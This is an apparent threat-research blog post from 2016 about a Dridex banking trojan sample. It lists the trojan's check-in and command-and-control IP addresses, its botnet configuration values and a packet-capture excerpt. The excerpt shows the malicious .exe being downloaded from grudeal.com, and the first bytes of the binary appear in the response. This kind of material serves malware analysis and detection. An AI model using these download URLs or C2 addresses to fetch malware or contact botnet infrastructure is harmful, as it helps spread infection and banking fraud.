Malware Sample Dridex Banking Trojan .DOC Macro Download .EXE & C2 PCAP Traffic Sample

By | January 29, 2016

Dridex PCAP Sample #2 : dridex2.pcap

This is what happens when you open the .doc file – a Macro runs which downloads a malicious executable:

macro_dridex

 

macro_dridex2

 

Checks in and downloads data from :

https://119.160.223.115:1143
https://151.80.142.33:1743
https://202.69.40.173:243
https://216.117.130.191:1143

After checking in, these C2 sites were used :

https://103.23.154.184:443
https://129.15.78.110:443
https://148.202.223.222:443
https://14.98.240.58:443
https://176.53.0.103:443
https://181.177.231.245:443
https://185.47.108.92:443
https://188.126.116.26:443
https://193.17.184.250:443
https://194.126.100.220:443
https://200.57.183.176:443
https://41.38.18.230:443
https://41.86.46.245:443
https://46.183.66.210:443
https://5.9.37.137:444
https://62.109.133.248:444
https://83.183.139.175:444
https://91.82.255.68:443

These Dridex configurations were also found :

<botnet>220</botnet>
<version>196773</version>   

Sample from the attached pcap network traffic:

2016-01-27 13:27:52.710508 IP 192.168.56.16.52784 > 8.8.8.8.53: 19471+ A? grudeal.com. (29)
E..9……1K..8……0.5.%&.L…………grudeal.com…..
2016-01-27 13:27:52.735341 IP 8.8.8.8.53 > 192.168.56.16.52784: 19471 1/0/0 A 192.254.234.133 (45)
E..I….0..U……8..5.0.5t.L…………grudeal.com…………./…….
2016-01-27 13:27:52.768156 IP 192.168.56.16.49162 > 192.254.234.133.80: Flags [S], seq 3813713268, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@…U…8……
.P.P.t…… .a……………

2016-01-27 13:27:52.808316 IP 192.168.56.16.49162 > 192.254.234.133.80: Flags [P.], seq 1:336, ack 1, win 16425, length 335: HTTP: GET /54t4f4f/7u65j5hg.exe HTTP/1.1
E..w..@…T…8……
.P.P.u…_P.@)….GET /54t4f4f/7u65j5hg.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: grudeal.com
Connection: Keep-Alive
2016-01-27 13:27:52.844333 IP 192.254.234.133.80 > 192.168.56.16.49162: Flags [.], ack 336, win 237, length 0
E(.(..@.5..{……8..P.
…_.P..P…w………
2016-01-27 13:27:52.849601 IP 192.254.234.133.80 > 192.168.56.16.49162: Flags [.], seq 1:1461, ack 336, win 237, length 1460: HTTP: HTTP/1.1 200 OK
E(….@.5………8..P.
…_.P..P…….HTTP/1.1 200 OK
Server: nginx/1.8.1
Date: Wed, 27 Jan 2016 18:27:52 GMT
Content-Type: application/x-msdownload
Content-Length: 266752
Connection: keep-alive
Last-Modified: Wed, 27 Jan 2016 13:19:30 GMT
Accept-Ranges: bytes

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..
$……..f|………………………………………..i………!…………U…………..Rich…………PE..L……V………….. ……$………………..@……………………..P……3…………………………………p…….. …………………………………………………………@……………`……………………….text…………………………. ..`.rdata..@………………………@..@.data….,……………………..@….rsrc…….. …0………………@..@……………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………….C………..U..V……C…….E..t V……….^]…………U..j.h..B.d…..Pd.%….QV…u……3..E..N…..C.j..A..A…..P.A..E.P.U….M…^d……..]…..V……C..~$.r..F.P./……3..F$…..F .F..

2016-01-27 13:27:53.973364 IP 192.254.234.133.80 > 192.168.56.16.49162: Flags [.], seq 204401:205861, ack 336, win 237, length 1460: HTTP
E(…~@.5..9……8..P.
…..P..P…+>….=…[..4.l.~…Ih4Pv..P.=i.,……….;…j..D._9.;.Ro.b. }1…m..}…..>..M…….U…..I.W.].}:….?..C.M…….x.P…J…._.+a.-..n..S/}.]]{.=o……)…..C.)Dx…=r.*`=U..u’.h..Yk…F.3]..=.
.5..1…c.9.W`.}Q….6F.-……….+…s..Z.W=.#._j.e…M.r.m..}……..9…….G…./|}u.].??…….i.M….J..f.y…=..
.w.7I.-…..N*..h]].=L…….4….K.(%….4.=)R$ 9.8!.B…….x.3x..8.k._..0……=ye.sd…C6i5L……….E…}A.I……}o.c…$.y._..K…..S..>…….2….6cMu.E..=0…?..Cju….~..q.S…=….q..E.=…..E/}.@_*.=Q……;…..3w*l….DaI [9U..g…..ml…}.:N..1.{.5.. …g..,.u’DE..y3=^-9……….+…u..u.y1.6._t.e…#.j.Y..[…..=……….j….tomq.u%f=…….Q;?………`…1..=.w.pc.)..1..U.q..^U.8>…………M~&Ou8..%tE-[>%..g .m…R…..]3….{.5..P…c…ip). …N(]=)……….#…[1.N.Z..5.R …j
R.y….m…..6../…….G….2o}s.r..1 ……i.M….Q..z.P……D._.6d…….E6j.Tk(.9^…… …..[u.J..
.
.S.K>s..D*.k..Yk…..]3..%.{.5..7.s…9.~f.s|..ZYSl”W……….+…m1.].r9.;.u..a.j
S.y….s…..S..?…….J….#o}q.i..= ……G.M….l..z.V…+..,’P.)..-.. ..o#}.s]]..@……-4….!UO9J.}.Eu2:Y-c..o+.Z..pI…}.1]..0.y….1…O.9.}e6WA..}>4z.-……….+……e.G&.C.zl.q.
,.Y.p……..:..W…….r…..Yte.{.!…..=..O.O…….F.S…L..K.K.qo.-,….+A..K]].=>…….j….Y{*Z….4].)[?U8.Q..d..r….s..+..S…0..2…h.9..i.}z..[.=i.
……….)…Q..3.G..*.bV.a.4…y.}..P…..5..H…….B……}..X8………C.E…….
2016-01-27 13:27:54.012619 IP 192.168.56.16.49163 > 65.52.108.163.443: Flags [P.], seq 1:122, ack 1, win 16560, length 121
E…..@…S…8.A4l……..(….P.@………t…p..V..x…….. bZ…..N.\.)..[…A…./.5…
….. .
.2.8……./…………..urs.microsoft.com.
…………..
2016-01-27 13:27:54.051914 IP 65.52.108.163.443 > 192.168.56.16.49163: Flags [.], seq 1:1461, ack 122, win 513, length 1460
E(..u.@.n..rA4l…8………….P………..’…M..V..)….a..TXU.y G..+……K.w,. </…&M…..^…./
…xR.GdY……………..c..`..u0..q0..Y…….Z….<.gKbu.L……0.. *.H……..0..1.0 ..U….US1.0…U…
Washington1.0…U….Redmond1.0…U.
..Microsoft Corporation1.0…U….Microsoft IT1.0…U….Microsoft IT SSL SHA20…150307004720Z..170306004720Z0.1.0…U….urs.microsoft.com0..”0.. *.H………….0..
…….”..S………..4.AG…_).A..8K..k_R.q^tf…….v.y)7u.;LI Q.\&..NQ…y.Rc.&………._N.a…+.4d./<. @..c…..hl..t#F.mG.#3…/.F.%….c9…h.E5h.Y0.,/..n.”….l…hC..“t………K>{…_.u.].\.p.D..vU..H1s`.6…..c3…….h.X .`1QrA..F../?..i…^……e……..:0..60…U……!`..U(…..T!N……0…U……..0…U.#..0…Q.$&..h”W.&+;Fb.{…0}..U…v0t0r.p.n.6http://mscrl.microsoft.com/pki/mscorp/crl/msitwww2.crl.4http://crl.microsoft.com/pki/mscorp/crl/msitwww2.crl0p..+……..d0b0<..+…..0..0http://www.microsoft.com/pki/mscorp/msitwww2.crt0″..+…..0…http://ocsp.msocsp.com0…U.%..0…+………+…….0N..U. .G0E0C. +…..7*.0604..+……..(http://www.microsoft.com/pki/mscorp/cps.0′. +…..7.
..0.0
..+…….0
..+…….0^..U…W0U..urs.microsoft.com..beta.urs.microsoft.com..c.urs.microsoft.com..x.urs.microsoft.com0.. *.H…………..%#.l……j.1…w.6{t…..7..c.>O.)..`…k..,E….;……..O…….N.l.SJ..$../.{.3b…&….F
Tn.U….
….).?….”..Qw….r.’C.._X$.;…/j.:)…..[<..-….7h}@…n……..P_.(F…L5.^`.j…lN…).]!……S>.o.e.i<…A..xR
2016-01-27 13:27:54.051921 IP 65.52.108.163.443 > 192.168.56.16.49163: Flags [.], seq 1461:2921, ack 122, win 513, length 1460
E(..u.@.n..qA4l…8……..y….P…`… .-…
i..0z…-.#…Z.[$F..L.6.
..9#…R…pn…{.^…1x’..K.-…F…….Uz.Q……)..p…+S……?..+t..L..F.
.mm..m ..4L.,.e..R…..H.
5;….4..PS.).A?.I.}o..8?…_7w…..R[….P.,.ZSWPO.S.I.x.F!I…’.Y..G…..U……y4Q..j..Y..fz’ K…..l………Q…..c.Q.r/N’:Q…w.PK…………u.S…0…0………..’.G0.. *.H……..0Z1.0 ..U….IE1.0…U.
. Baltimore1.0…U…
CyberTrust1″0 ..U….Baltimore CyberTrust Root0…140507170409Z..180507170330Z0..1.0 ..U….US1.0…U…
Washington1.0…U….Redmond1.0…U.
..Microsoft Corporation1.0…U….Microsoft IT1.0…U….Microsoft IT SSL SHA20..”0.. *.H………….0..
…….7.v.pK.. 7 $7…x…j.N’..rj.l!.d..s.
\%{.l……{.J..>…..0m…R.=.G…}..W.?T.:..w.B.cIj…0I…+..:..]…….. ).n] ……P.D..W….1..{*…=Q….{…S…c.A3.G$i].F…..Ozx%’!&4..n7Q..X.`……0$%…..5]….).s.tY.Rg..gQ9.:6…v+…=…..n…V…..u2..c.t..
..4.g…B8x………..Y….,2…)dy<.K.2tl….k]WZh…y….I.^…..2…..K……}…|.N……%_…..(..3Z.?…..9.&…………gR…..==.p6..Bo….[]..:…w….N….h7 .9……n.m.J/. o.J……..c.3.T|B.h…….].;..h.
U.!d……]Y..D…….AJ……….{0..w0…U…….0…….0`..U. .Y0W0H. +…..>..0;09..+……..-http://cybertrust.omniroot.com/repository.cfm0.. +…..7*.0B..+……..60402..+…..0..&http://ocsp.omniroot.com/baltimoreroot0…U………..0′..U.%. 0…+………+………+…… 0…U.#..0…..Y0.GX….T6.{:..M.0B..U…;0907.5.3.1http://cdp1.pub
2016-01-27 13:27:54.051928 IP 65.52.108.163.443 > 192.168.56.16.49163: Flags [P.], seq 2921:3629, ack 122, win 513, length 708
E(..u.@.n..`A4l…8……..-….P….f..lic-trust.com/CRL/Omniroot2025.crl0…U……Q.$&..h”W.&+;Fb.{…0.. *.H………….ib…..o.{$.B….\..D..Rvc.v.x.i5.8……{..ew.}..d…..Xe………..~D..a…V.r..(.i!..n..C.6….(..E……dy…..!..N{.”…<…
.~……..<.}..@.|..o.O&E ..\…..L…..0.+…..y…?. .?e..O.$…Nj.)……”…..9.V….t.<N.~.
..x..1D.1………,.m.E…?4….g…a.jw…-4.l..L………F..LY…N:..;..
..k..& ./.&X…….Mq………2#……S.).A
h. .&….0.i…..)..V..d…o.-^.m..+”C.Hr8C[..$/.=d…] .<…..>….B.E…f..35nC….o.W……:E..#.uao….)./…m…..L..!xo..4.$….[.+`_V………u….]..t.j..Q.5;..&.1…C~…….kj,……….L…?4….f’.&..1=Q.$/R,.>………’$.@….f….1……../h.yj.

Share Button